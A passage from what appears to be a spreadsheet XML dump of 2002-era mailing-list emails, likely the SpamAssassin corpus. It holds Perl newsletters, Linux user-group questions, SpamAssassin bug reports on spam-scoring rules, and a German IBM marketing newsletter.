[URL]http://www.webmasterworld.com[/URL]\n[9]  [URL]http://www.webmasterworld.com[/URL]\n[10] [URL]http://www.webmasterworld.com[/URL]\n[11] [URL]http://www.google.com[/URL]\n[12] [URL]http://diveintomark.org[/URL]\n[13] [URL]http://www.google.com[/URL]\n[14] [URL]http://www.venere.it[/URL]\n[15] [URL]http://www.venere.it[/URL]\n[16] [URL]http://www.google.com[/URL]\n[17] [URL]http://www.news-observer.com[/URL]\n[18] [URL]http://www.linkslsgolfworld.com[/URL]\n[19] [URL]http://www.nando.net[/URL]\n[20] [URL]http://www.google.com[/URL]\n[21] [URL]http://www.alltheweb.com[/URL]\n[22] [URL]http://www.alltheweb.com[/URL]</t>
  </si>
  <si>
    <t>http://diveintomark.org http://www.google.com http://www.pradnetwork.com http://uber.nu http://www.google.com http://www.microsoft.com http://www.google.com http://www.ohmessylife.com http://www.webmasterworld.com http://www.webmasterworld.com http://www.webmasterworld.com http://www.google.com http://diveintomark.org http://www.google.com http://www.venere.it http://www.venere.it http://www.google.com http://www.news-observer.com http://www.linkslsgolfworld.com http://www.nando.net http://www.google.com http://www.alltheweb.com http://www.alltheweb.com</t>
  </si>
  <si>
    <t>To: yyyy-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Thu, 03 Oct 2002 02:00:33 +0000</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 02:00:33 +0000</t>
  </si>
  <si>
    <t>[use Perl] Stories for 2002-10-03</t>
  </si>
  <si>
    <t>use Perl Daily Newsletter\n\nIn this issue:\n    * Mailing List Judo movie available\n    * Conference Presentation Judo movie available\n\n+--------------------------------------------------------------------+\n| Mailing List Judo movie available                                  |\n|   posted by gnat on Wednesday October 02, @12:47 (news)            |\n|   [URL]http://use.perl.org[/URL]              |\n+--------------------------------------------------------------------+\n\n[0]gnat writes "Mark-Jason Dominus's [1]Mailing List Judo is now\navailable from perl.org. Thanks to David Wheeler for recording Mark's\nsessions. Conference Presentation Judo will come later today ..."\n\nDiscuss this story at:\n    [URL]http://use.perl.org[/URL]\n\nLinks:\n    0. mailto:gnat@oreilly.com\n    1. [URL]http://www.perl.org[/URL]\n\n\n+--------------------------------------------------------------------+\n| Conference Presentation Judo movie available                       |\n|   posted by gnat on Wednesday October 02, @18:56 (news)            |\n|   [URL]http://use.perl.org[/URL]              |\n+--------------------------------------------------------------------+\n\n[0]gnat writes "Mark-Jason Dominus's [1]Conference Presentation Judo\npresentation is online at perl.org. Thanks again to David Wheeler for\nrecording this at OSCON."\n\nDiscuss this story at:\n    [URL]http://use.perl.org[/URL]\n\nLinks:\n    0. mailto:gnat@oreilly.com\n    1. [URL]http://www.perl.org[/URL]\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http://use.perl.org http://use.perl.org http://www.perl.org http://use.perl.org http://use.perl.org http://www.perl.org http://use.perl.org</t>
  </si>
  <si>
    <t>To: yyyy-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Thu, 03 Oct 2002 02:00:24 +0000</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 02:00:24 +0000</t>
  </si>
  <si>
    <t>[use Perl] Headlines for 2002-10-03</t>
  </si>
  <si>
    <t>use Perl Daily Headline Mailer\n\nMailing List Judo movie available\n    posted by gnat on Wednesday October 02, @12:47 (news)\n    [URL]http://use.perl.org[/URL]\n\nConference Presentation Judo movie available\n    posted by gnat on Wednesday October 02, @18:56 (news)\n    [URL]http://use.perl.org[/URL]\n\n\n\n\nCopyright 1997-2002 pudge.  All rights reserved.\n\n\n======================================================================\n\nYou have received this message because you subscribed to it\non use Perl.  To stop receiving this and other\nmessages from use Perl, or to add more messages\nor change your preferences, please go to your user page.\n\n	[URL]http://use.perl.org[/URL]\n\nYou can log in and change your preferences from there.</t>
  </si>
  <si>
    <t>To: "=?iso-8859-1?Q?RPM=2DList?=" &lt;rpm-zzzlist@freshrpms.net&gt;\nFrom: "" Angles " Puglisi" &lt;angles@aminvestments.com&gt;\nDate: Thu, 01 Aug 2002 18:54:16 +0000</t>
  </si>
  <si>
    <t>Thu, 01 Aug 2002 18:54:16 +0000</t>
  </si>
  <si>
    <t>"=?iso-8859-1?Q?RPM=2DList?=" &lt;rpm-zzzlist@freshrpms.net&gt;</t>
  </si>
  <si>
    <t>I am a php programmer (very busy one at that - anglemail.org) but if someone gets to this before me, I would also love to se the code because I want my rpms site to be more user friendly. Matthias Saou (matthias@egwn.net) wrote*: &gt; &gt;Sorry, this hasn't got much to do with rpm packages directly ;-) &gt; &gt;My "builds" page is getting bigger and bigger, and quite messy as &gt;directories are listed in no particular order : &gt;[URL]http://freshrpms.net[/URL] &gt; &gt;What I'd need is to have last modification date of the directory displayed &gt;next to the directory name (sort of like "mplayer - Thu Aug 1 2002"), and &gt;the list ordered to have the most recent entries at the top. &gt; &gt;Now, if there are php programmers on this list, I'd love to have their help &gt;on how to do this ;-) It must be quite simple to get the system mtime for &gt;the directory, it's the ordering that scares me a bit more. &gt; &gt;Attached is the current code (please keep in mind that I'm not a &gt;programmer, it usually explains a lot ;-)). &gt; &gt;Matthias &gt; &gt; -- That's "angle" as in geometry. _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Paul Mc Auley &lt;pmcauley@iol.ie&gt;\nDate: Thu, 01 Aug 2002 17:41:03 +0100</t>
  </si>
  <si>
    <t>Thu, 01 Aug 2002 17:41:03 +0100</t>
  </si>
  <si>
    <t>Paul Mc Auley &lt;pmcauley@iol.ie&gt;</t>
  </si>
  <si>
    <t>[ILUG] Re: serial console question</t>
  </si>
  <si>
    <t>On Thu, 1 Aug 2002 17:15:27 +0100  "John P. Looney"   wrote: |  I've found a decrepit raq3 that I'm going to resurrect, as soon as I work | out what's up with the console. |  I'm using 115200 8n1 with minicom, and I'm getting wierd stuff like: | S+#_+q_x0001_ INET __+_:  | S+#_+q_x0001_ p_x0001___ M++q_x0001_ _++ +_&lt;_++_. | S+#_+q_x0001_ #+__+ S+#_+q_x0001_ #+ + __+_:  | I+#+ _+#+_ _ +# _+ -- N+ _+#_+q_x0001_ SSL |  So it looks like some sort of setting mismatch. Various places on the web | say that cobalts are setup with 115200 8n1 serial ports, but someone could | have changed it on this particular box. |  Anyone care to guess what's up ? One possible is that it's toggling the VTx00 alt character set. If  that's the case, feeding ^O to the tty somehow (i.e. cat to the device)  should flip it back. 	Paul --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: iiu-admin@taint.org\nFrom: iiu-admin@taint.org\nDate: Thu, 01 Aug 2002 17:00:01 +0100</t>
  </si>
  <si>
    <t>Thu, 01 Aug 2002 17:00:01 +0100</t>
  </si>
  <si>
    <t>1 IIU admin request(s) waiting</t>
  </si>
  <si>
    <t>The IIU@iiu.taint.org mailing list has 1 request(s) waiting for your\nconsideration at:\n\n	[URL]http://iiu.taint.org[/URL]\n	\nPlease attend to this at your earliest convenience.  This notice of\npending requests, if any, will be sent out daily.\n\n\nPending posts:\n     From: emailharvest@email.com on Wed Jul 31 17:08:17 2002\n    Cause: Post by non-member to a members-only list</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Padraig Brady &lt;padraig.brady@corvil.com&gt;\nDate: Thu, 01 Aug 2002 16:03:07 +0100</t>
  </si>
  <si>
    <t>Thu, 01 Aug 2002 16:03:07 +0100</t>
  </si>
  <si>
    <t>[ILUG] stupid pics of the day</t>
  </si>
  <si>
    <t>Some local Irish wildlife\n\n[URL]http://www.iol.ie[/URL]\n[URL]http://www.iol.ie[/URL]\n\nwas I bored or what?\n\nPdraig.\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Padraig Brady &lt;padraig.brady@corvil.com&gt;\nDate: Thu, 01 Aug 2002 15:58:38 +0100</t>
  </si>
  <si>
    <t>Thu, 01 Aug 2002 15:58:38 +0100</t>
  </si>
  <si>
    <t>[ILUG] Am I cracked?</t>
  </si>
  <si>
    <t>Well you know what I mean.\n\nI noticed 2 connections from my\n(freshly installed RH7.3) machine to\nport 80 of the following addresses.\n\n216.145.20.5\n216.254.17.87\n\nBoth resolve to cytocin.hubbe.NET\nusing CCOM.NET &amp; speakeasy.NET DNS\nservers respectively.\n\nBoth connections lasted about 20\nseconds and were about 2 minutes apart.\nAny ideas?\n\nI didn't see what processes they came from,\nbut I'm keeping a close eye now.\n\nThanks,\nPdraig.\n\np.s. I'm can't subscribe to the list\nat the moment for some reason? so please\nreply directly.\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: Brent Welch &lt;welch@panasas.com&gt;, exmh-workers@spamassassin.taint.org\nFrom: Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;\nDate: Thu, 01 Aug 2002 13:09:56 -0500</t>
  </si>
  <si>
    <t>Thu, 01 Aug 2002 13:09:56 -0500</t>
  </si>
  <si>
    <t>--==_Exmh_2077566172P Content-Type: text/plain; charset=us-ascii &gt; From:  Chris Garrigues  &gt; Date:  Thu, 01 Aug 2002 10:01:04 -0500 &gt; &gt; &gt; If you run Pick, and then use the "New FTOC" button to show only &gt; &gt; those messages selected by pick, then the ftoc display was considered &gt; &gt; "invalid" in the old code.  This prevented the display from being cached, &gt; &gt; and it meant that you could get back to the full folder display by &gt; &gt; clicking on the folder lablel.  That doesn't work anymore.  You have &gt; &gt; to resort to Rescan Folder.  In fact, when you change folders you &gt; &gt; continue to have the Pick results, not the new folder contents. &gt; &gt; If you go to a any folder and do Rescan, then it heals itself. &gt;  &gt; Well, that's obviously my fault.  Okay, will look when I get a chance. My copy of the tree right now is full of organizational changes in  preparation for generalizing the unseen window for display of other  sequences, so I'll probably not check in a fix for this until I  stabilize that. Chris --  Chris Garrigues                 [URL]http://www.DeepEddy.Com[/URL] virCIO                          [URL]http://www.virCIO.Com[/URL] 716 Congress, Suite 200 Austin, TX  78701		+1 512 374 0500   World War III:  The Wrong-Doers Vs. the Evil-Doers. --==_Exmh_2077566172P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Exmh version 2.2_20000822 06/23/2000 iD8DBQE9SXl0K9b4h5R0IUIRAsr/AJ96ydWWdsjfZ7fqVwq7TJ4ggAvMagCeOV0a HEX6F2zWp6uFZMRim5GKcpY= =c2hQ -----END PGP SIGNATURE----- --==_Exmh_2077566172P-- _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Mike Masnick &lt;mike@techdirt.com&gt;\nDate: Thu, 01 Aug 2002 11:38:24 -0700</t>
  </si>
  <si>
    <t>Thu, 01 Aug 2002 11:38:24 -0700</t>
  </si>
  <si>
    <t>Naveen Jain steps down</t>
  </si>
  <si>
    <t>From: [URL]http://www.xent.com[/URL]\n\n &gt; "There are two kinds of people in this world, right? Nonbelievers and\n &gt; believers," the animated Jain said to his audience at the Chase H&amp;Q\n &gt; plaNET.wall.street Internet conference last week. "In other words, those\n &gt; who don't believe in God, and those who believe in God and InfoSpace.\n &gt; That's OK -- the nonbelievers will be converted when we become a\n &gt; trillion-dollar company."\n\nChalk one up for the nonbelievers:\n\n[URL]http://www.siliconvalley.com[/URL]\n\nInfoSpace CEO to step down\n\nBELLEVUE, Wash. AP) - InfoSpace Inc. chairman and chief executive Naveen \nJain will step down from his posts once the Internet services and software \ncompany finds a replacement.\n\nJain, a former Microsoft executive, founded InfoSpace six years ago and led \nthe company through its rise and fall. His departure from the top posts was \nannounced Wednesday.\n\nWith its stock now trading for dimes, InfoSpace is in danger of being \ndelisted from the Nasdaq Stock Market. The company is asking shareholders \nto approve a one-for-10 reverse stock split to prop up the price. If \napproved on Sept. 12, shareholders would trade in 10 shares of stock for \none new share.\n\nThe company has had trouble retaining its top-level executives in the past, \nincluding most recently, former chief executive Arun Sarin who resigned \nlast year after just nine months on the job.\n\nThe company said Jain will remain as a company employee.\n\nShares of InfoSpace fell 2 cents to 43 cents in afternoon trading on Nasdaq.\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://www.xent.com http://www.siliconvalley.com http://xent.com</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: martyh@nmcourts.com (Marty Halvorson)\nDate: Thu, 01 Aug 2002 09:47:36 -0600</t>
  </si>
  <si>
    <t>Thu, 01 Aug 2002 09:47:36 -0600</t>
  </si>
  <si>
    <t>martyh@nmcourts.com (Marty Halvorson)</t>
  </si>
  <si>
    <t>Elias Sinderson wrote:\n &gt; Heh. Never mind the perfectly good desert in the southwest, right? Or is\n &gt; that area too hot for desert warfare training? I'll never understand.\n\nHow hot it feels is affected by both temperature and humidity.  In \nMississippi they have lots of humidity, in the Southwest, we don't.\n\nAs I know from experience, Mississippi feels a lot hotter at 90 degrees F. \nthan home (Santa Fe) does at 90.\n\nPerhaps the military didn't want to train in a real desert because 1) it \nget's over 100 degrees and any time the air temp is greater than body temp \nit affects performance, and 2) when those troops go to a real desert \nthey'll think it's so much nicer than Mississippi.\n\nNo, I'm not maligning Mississippi.  I had a great time passing through last \nyear on vacation.\n\nPeace,\n\nMarty Halvorson\nmarty@halvorson.us\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: spamassassin-devel@example.sourceforge.net\nFrom: bugzilla-daemon@hughes-family.org\nDate: Thu,  5 Sep 2002 22:22:08 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu,  5 Sep 2002 22:22:08 -0700 (PDT)</t>
  </si>
  <si>
    <t>[SAdev] [Bug 839] mailbox corruption not fixed with procmail 3.22</t>
  </si>
  <si>
    <t>[URL]http://www.hughes-family.org[/URL]\n\n\n\n\n\n------- Additional Comments From alan@rdrop.com  2002-09-05 22:22 -------\nI haven't tried 2.41 yet because it requires File::Spec, which barfs when\nspamassassin tries to use it.  I haven't filed a bug yet because I suspect it's\nbecause I'm still running 5.005 perl because of reported compatibility issues\nwith 5.6 and later, but I probably will because I think there's too much legacy\nperl code to put up with major compatibility problems, and spamassassin didn't,\nat least in the quickest of looks, say it needed a newer one.  The perl @ stuff\nwas bad enough...  but this is all a separate soapbox...\n\n\n\n------- You are receiving this mail because: -------\nYou are the assignee for the bug, or are watching the assignee.\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by: OSDN - Tired of that same old\ncell phone?  Get a new here for FREE!\n[URL]https://www.inphonic.com[/URL]\n_______________________________________________\nSpamassassin-devel mailing list\nSpamassassin-devel@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: XXXXXX.YYYYYYYYYY@RUHR-UNI-BOCHUM.DE\nFrom: IBM Deutschland &lt;info@isource.ibm.com&gt;\nDate: Thu,  4 Jul 2002 13:32:06 +0000 (CUT)</t>
  </si>
  <si>
    <t>Thu,  4 Jul 2002 13:32:06 +0000 (CUT)</t>
  </si>
  <si>
    <t>IBM Deutschland &lt;info@isource.ibm.com&gt;</t>
  </si>
  <si>
    <t>XXXXXX.YYYYYYYYYY@RUHR-UNI-BOCHUM.DE</t>
  </si>
  <si>
    <t>IBM eNews: Aktuelle Informationen von IBM</t>
  </si>
  <si>
    <t>IBM eNews\n4. Juli 2002\n\nLiebe Leserin, lieber Leser,\n\nzur Zeit findet in Wimbledon das diesjhrige Tennisturnier \nstatt - mit Hilfe von IBM auch online unter \n[URL]http://www.wimbledon.org[/URL] ein packendes Ereignis. \n\nLesen Sie mehr ber diesem Internetauftritt und zu \nzahlreichen weiteren Themen aus der IT-Branche in der \naktuellen Ausgabe von IBM eNews.\n\nNutzen Sie die Mglichkeit, auf folgender Webseite aus ber \n40 Interessensgebieten die Themen fr Ihre persnliche \nIBM eNews Ausgabe auszuwhlen. Sie erhalten dann Business-\nInformationen nach Ma:\n[URL]http://www.ibm.com[/URL]\n\nAlle Artikel knnen Sie jederzeit online auf dieser Webseite \naufrufen:\n[URL]http://www.ibm.com[/URL]\n\nWir halten Sie auf dem Laufenden\nIBM eNews\n\nWenn Sie in Zukunft IBM eNews nicht mehr erhalten mchten, \nknnen Sie sich auf dieser Webseite abmelden:\n[URL]http://www.ibm.com[/URL]\n\n\n\nIn der heutigen Ausgabe:\n========================\n\ne-business\n\n  o  Wimbledon gewinnt: Mit Hilfe von IBM auch online ein packendes Ereignis \n     [URL]http://isource.ibm.com[/URL]\n\n  o  Neues Buch "Deutschland Online" weist Weg in die\n      Informationsgesellschaft \n     [URL]http://isource.ibm.com[/URL]\n\n  o  Weitere Artikel aus dem Bereich "e-business" \n     [URL]http://isource.ibm.com[/URL]\n\nBusiness Lsungen und Services\n\n  o  Mehr Training fr alle: IBM Learning Services Corporate Card \n     [URL]http://isource.ibm.com[/URL]\n\n  o  Weitere Artikel aus dem Bereich "Business Lsungen und Services"  \n     [URL]http://isource.ibm.com[/URL]\n\nIT Solutions und Services\n\n  o  e-guide aktuell: Produkte und Lsungen fr den Mittelstand -\n      zusammengefasst im IBM Kundenmagazin! \n     [URL]http://isource.ibm.com[/URL]\n\n  o  Sprechen Sie mit uns: Sicherheit ist Trumpf \n     [URL]http://isource.ibm.com[/URL]\n\n  o  Weitere Artikel aus dem Bereich "IT Solutions und Services" \n     [URL]http://isource.ibm.com[/URL]\n\nSoftware\n\n  o  Software fr den Mittelstand \n     [URL]http://isource.ibm.com[/URL]\n\n  o  WebSphere Integration \n     [URL]http://isource.ibm.com[/URL]\n\n  o  Weitere Artikel aus dem Bereich "Software"  \n     [URL]http://isource.ibm.com[/URL]\n\nHardware\n\n  o  Neu: IBM ThinkPad A31p - Die erste mobile 3D-Workstation! \n     [URL]http://isource.ibm.com[/URL]\n\n  o  IBM eServer* pSeries 630 6E4/6C4 - Ankndigung des neuen Entry Servers \n     [URL]http://isource.ibm.com[/URL]\n\n  o  Weitere Artikel aus dem Bereich "Hardware" \n     [URL]http://isource.ibm.com[/URL]\n\n\n\n------------------------------------------------------------\ne-business\n------------------------------------------------------------\n\nWimbledon gewinnt: Mit Hilfe von IBM auch online ein packendes Ereignis \n\n   Die neue Turnier-Website bietet Tennisfans in aller Welt \n  sekundenaktuelle Spielstnde, Live-Videos, Kommentare und \n  Interviews. Mit e-business on demand lsst sich dabei die \n  erforderliche Kapazitt fr den Ansturm whrend des Turniers \n  einfach einschalten - und anschlieend ebenso einfach wieder \n  abschalten. Ein echter Service-Gewinn, Klick fr Klick. \n  [URL]http://isource.ibm.com[/URL]\n  \n\n\nNeues Buch "Deutschland Online" weist Weg in die\n      Informationsgesellschaft \n\n  "Die schnelle Transformation in die Informationsgesellschaft ist \n  Deutschlands letzte Chance, um im Kreis der groen \n  Wirtschaftsmchte zu verbleiben. Deutschland muss IT-Weltmacht \n  werden - und das pronto!" Das verlangte der Vorsitzende der \n  Geschftsfhrung der IBM Deutschland, Erwin Staudt, anlsslich \n  der Vorstellung des Buches "Deutschland online" - Strategien und \n  Projekte fr die Informationsgesellschaft - in Berlin.\n   [URL]http://isource.ibm.com[/URL]\n\n\nWeitere Artikel aus dem Bereich "e-business" \n\n  Weitere Artikel aus dem Bereich "e-business" finden Sie online\n  auf unserer IBM eNews Website:\n  [URL]http://isource.ibm.com[/URL]\n     \n  Unter folgender Adresse knnen Sie Ihre Interessensgebiete \n  auswhlen und erhalten dann Business-Informationen nach Ma:\n  [URL]http://www-5.ibm.com[/URL]\n\n\n\n------------------------------------------------------------\nBusiness Lsungen und Services\n------------------------------------------------------------\n\nMehr Training fr alle: IBM Learning Services Corporate Card \n\n  IBM Learning Services bietet Ihnen preisgnstige Trainings: Mit \n  der IBM Learning Services Corporate Card sparen Sie bis zu 1.650 \n  Euro. Im Unterschied zur IBM Learning Services Education Card \n  knnen Sie damit alle Ihre Mitarbeiter/innen zu den Trainings \n  senden.\n  [URL]http://isource.ibm.com[/URL]\n\n\nWeitere Artikel aus dem Bereich "Business Lsungen und Services"  \n\n  Weitere Artikel aus dem Bereich "Business Lsungen und Services" \n  finden Sie online auf unserer IBM eNews Website:\n  [URL]http://isource.ibm.com[/URL]\n     \n  Unter folgender Adresse knnen Sie Ihre Interessensgebiete \n  auswhlen und erhalten dann Business-Informationen nach Ma:\n  [URL]http://www-5.ibm.com[/URL]\n\n\n\n------------------------------------------------------------\nIT Solutions und Services\n------------------------------------------------------------\n\ne-guide aktuell: Produkte und Lsungen fr den Mittelstand -\n      zusammengefasst im IBM Kundenmagazin! \n\n  Mit dieser Ausgabe bernehmen wir Teile des Heftes auch im Web. \n  Lesen Sie hier mehr ber den neuen Produkt- und Lsungsteil \n  oder bestellen Sie sich Ihr Exemplar des IBM Kundenmagazins \n  "e-guide" 2/2002.\n  [URL]http://isource.ibm.com[/URL]\n\n\nSprechen Sie mit uns: Sicherheit ist Trumpf \n\n  Sie machen sich sicherlich Gedanken darber, ob Ihre e-business \n  Infrastruktur wirkungsvoll geschtzt ist - insbesondere vor dem \n  Hintergrund sich ffnender Strukturen.\n  IBM - als einer der Vorreiter im Bereich e-business Sicherheits-\n  strategien - bietet Ihnen Lsungen, mit denen Sie Ihre \n  IT-Infrastruktur sichern knnen. berzeugen Sie sich selbst:\n  [URL]http://isource.ibm.com[/URL]\n\n\nWeitere Artikel aus dem Bereich "IT Solutions und Services" \n\n  Weitere Artikel aus dem Bereich "IT Solutions und Services" \n  finden Sie online auf unserer IBM eNews Website:\n  [URL]http://isource.ibm.com[/URL]\n  \n  Unter folgender Adresse knnen Sie Ihre Interessensgebiete \n  auswhlen und erhalten dann Business-Informationen nach Ma:\n  [URL]http://www-5.ibm.com[/URL]\n\n\n\n------------------------------------------------------------\nSoftware\n------------------------------------------------------------\n\nSoftware fr den Mittelstand \n\n  Hier finden Sie ausgewhlte Software-Produkte mit Beispielen \n  unserer zufriedenen Kunden. Die IBM Produktfamilien WebSphere, \n  DB2, Lotus und Tivoli sind die Basis fr eine Vielfalt von \n  e-business Lsungen. Sie sind industrie-spezifisch, skalierbar \n  ausgerichtet und basieren auf offenen Standards, so dass sie \n  speziell auf die Bedrfnisse des Mittelstandes zugeschnitten \n  werden knnen.\n  [URL]http://isource.ibm.com[/URL]\n\n\nWebSphere Integration \n\n  Mit WebSphere Integration versucht die IBM keine Technologie zu \n  vermarkten, die die unberschaubare Vielfalt der Individual-\n  programmierungen um neue Facetten bereichert. Vielmehr agiert \n  sie wie ein Katalysator und ermglicht die Erweiterung und \n  Erneuerung von Systemlandschaften sowie die Migration von \n  geschftskritischen Daten. Mehr dazu im Software-Schwerpunkt \n  des Monats.\n  [URL]http://isource.ibm.com[/URL]\n\n\nWeitere Artikel aus dem Bereich "Software"  \n\n  Weitere Artikel aus dem Bereich "Software" finden Sie online\n  auf unserer IBM eNews Website:\n  [URL]http://isource.ibm.com[/URL]\n  \n  Unter folgender Adresse knnen Sie Ihre Interessensgebiete \n  auswhlen und erhalten dann Business-Informationen nach Ma:\n  [URL]http://www-5.ibm.com[/URL]\n\n\n\n------------------------------------------------------------\nHardware\n------------------------------------------------------------\n\nNeu: IBM ThinkPad A31p - Die erste mobile 3D-Workstation! \n\n  Der ThinkPad A31p (TV2N6GE, TV2L3GE, TV2N5GE) ist ausgerstet mit \n  einem Intel Pentium 4 Notebookprozessor-M, schnellen DDR Speicher-\n  modulen und einem extrem leistungsfhigen Grafikchip. Auch die \n  Highspeed Festplatte lsst keine Wnsche offen. Zwei modulare \n  Laufwerkschchte sorgen fr ein Plus an Flexibilitt. Das Notebook \n  ist mit einer 10/100 Ethernet-Karte, einem 56K V.92 Modem, \n  integrierten 802.11b Wireless-Antennen/-Chip, Bluetooth sowie \n  einem IEEE 1394 (Firewire)-Anschluss ausgerstet. \n  [URL]http://isource.ibm.com[/URL]\n\n\nIBM eServer* pSeries 630 6E4/6C4 - Ankndigung des neuen Entry Servers \n\n  IBM definiert den UNIX Entry Server neu. Zuverlssigkeit und\n  Verfgbarkeit der POWER4-Prozessortechnologie jetzt vom Entry- \n  bis zum Enterprise-Bereich, mit Selbstverwaltungsfunktionen aus \n  dem Projekt eLiza, ultraflaches Rack- oder Deskside-Modell, die \n  richtige Wahl fr kleine und mittelstndische Unternehmen.\n  [URL]http://isource.ibm.com[/URL]\n\n\nWeitere Artikel aus dem Bereich "Hardware" \n\n  Weitere Artikel aus dem Bereich "Hardware" finden Sie online\n  auf unserer IBM eNews Website:\n  [URL]http://isource.ibm.com[/URL]\n    \n  Unter folgender Adresse knnen Sie Ihre Interessensgebiete \n  auswhlen und erhalten dann Business-Informationen nach Ma:\n  [URL]http://www-5.ibm.com[/URL]\n\n \n\n\n============================================================\nSie erhalten diese E-Mail, da Sie zu IBM eNews\n  angemeldet sind als XXXXXX.YYYYYYYYYY@RUHR-UNI-BOCHUM.DE\n\n\n*Das IBM eServer Warenzeichen besteht aus dem eingefhrten \nIBM e-business Logo, gefolgt von dem beschreibenden Begriff \n"Server".\n  \nNach unseren Kundendaten sind Sie an Informationsmaterial von \nIBM interessiert. An- und Abmelden sowie Ihre Einstellungen \nndern knnen Sie auf folgender Website: \n[URL]http://www.ibm.com[/URL]\n\nKontakt: webmaster@de.ibm.com\nCopyright (c) 2002  IBM Deutschland</t>
  </si>
  <si>
    <t>http://www.wimbledon.org http://www.ibm.com http://www.ibm.com http://www.ibm.com http://isource.ibm.com http://isource.ibm.com http://isource.ibm.com http://isource.ibm.com http://isource.ibm.com http://isource.ibm.com http://isource.ibm.com http://isource.ibm.com http://isource.ibm.com http://isource.ibm.com http://isource.ibm.com http://isource.ibm.com http://isource.ibm.com http://isource.ibm.com http://isource.ibm.com http://isource.ibm.com http://isource.ibm.com http://www-5.ibm.com http://isource.ibm.com http://isource.ibm.com http://www-5.ibm.com http://isource.ibm.com http://isource.ibm.com http://isource.ibm.com http://www-5.ibm.com http://isource.ibm.com http://isource.ibm.com http://isource.ibm.com http://www-5.ibm.com http://isource.ibm.com http://isource.ibm.com http://isource.ibm.com http://www-5.ibm.com http://www.ibm.com</t>
  </si>
  <si>
    <t>To: spamassassin-devel@example.sourceforge.net\nFrom: bugzilla-daemon@hughes-family.org\nDate: Thu,  3 Oct 2002 21:51:06 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu,  3 Oct 2002 21:51:06 -0700 (PDT)</t>
  </si>
  <si>
    <t>[SAdev] [Bug 1054] New: Split up FROM_ENDS_IN_NUMS</t>
  </si>
  <si>
    <t>[URL]http://www.hughes-family.org[/URL]\n\n           Summary: Split up FROM_ENDS_IN_NUMS\n           Product: Spamassassin\n           Version: unspecified\n          Platform: Other\n        OS/Version: other\n            Status: NEW\n          Severity: enhancement\n          Priority: P2\n         Component: Rules\n        AssignedTo: spamassassin-devel@example.sourceforge.net\n        ReportedBy: matt@nightrealms.com\n\n\nThe current FROM_ENDS_IN_NUMS triggers on any from where the user name ends\nin two or more digits.  I think this should be split up into different\nnumbers of trailing digits, so that rules with different S/O ratios can\nget different scores.  So I've made test rules that look from From\nnames that end with two, three, four, or five digitis, and one for six or\nmore digitis; I also put in a test rule that looks for Froms that end in a\nsingle digit, just the sake of completeness.\n\nHere is what I got:\n\nOVERALL%   SPAM% NONSPAM%     S/O    RANK   SCORE  NAME\n  15113     4797    10316    0.32    0.00    0.00  (all messages)\n100.000   31.741   68.259    0.32    0.00    0.00  (all messages as %)\n  1.244    3.877    0.019    1.00    0.64    0.01  T_FROM_ENDS_IN_NUMS6\n  0.576    1.459    0.165    0.90    0.43    0.01  T_FROM_ENDS_IN_NUMS5\n  4.982   10.694    2.326    0.82    0.38    0.01  T_FROM_ENDS_IN_NUMS4\n  3.434    6.337    2.084    0.75    0.35    0.01  T_FROM_ENDS_IN_NUMS3\n  8.979   12.383    7.396    0.63    0.30    0.01  T_FROM_ENDS_IN_NUMS2\n  8.847    6.817    9.791    0.41    0.22    0.01  T_FROM_ENDS_IN_NUMS1\n\nI should note that I get rather bad S/O's for FROM_ENDS_IN_NUMS, probably\nbecause so much of my corpus is made up of Yahoo! Groups traffic, which\nseems to have a lot of users that like sticking numbers at the ends of their\nnames.  Here is the normal stats for FROM_ENDS_IN_NUMS:\n\n  7.024   28.480    2.834    0.91    0.50    0.88  FROM_ENDS_IN_NUMS\n\nand my stats:\n\n 19.228   34.793   11.991    0.74    0.35    0.88  FROM_ENDS_IN_NUMS\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21:46:38 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu,  3 Oct 2002 21:46:38 -0700 (PDT)</t>
  </si>
  <si>
    <t>[SAdev] [Bug 1053] IMG tag based rules</t>
  </si>
  <si>
    <t>[URL]http://www.hughes-family.org[/URL]\n\n\n\n\n\n------- Additional Comments From mgm@starlingtech.com  2002-10-03 21:46 -------\nLooks great! One note: most "image-only" spam actually has some text (a few \nwords at the top, a disclaimer at the end) so keep that in mind. The typical \nimage spam that slips through SA seems to have a bit of text, one huge image, \nthen a bit more.\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21:37:42 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu,  3 Oct 2002 21:37:42 -0700 (PDT)</t>
  </si>
  <si>
    <t>[SAdev] [Bug 1053] New: IMG tag based rules</t>
  </si>
  <si>
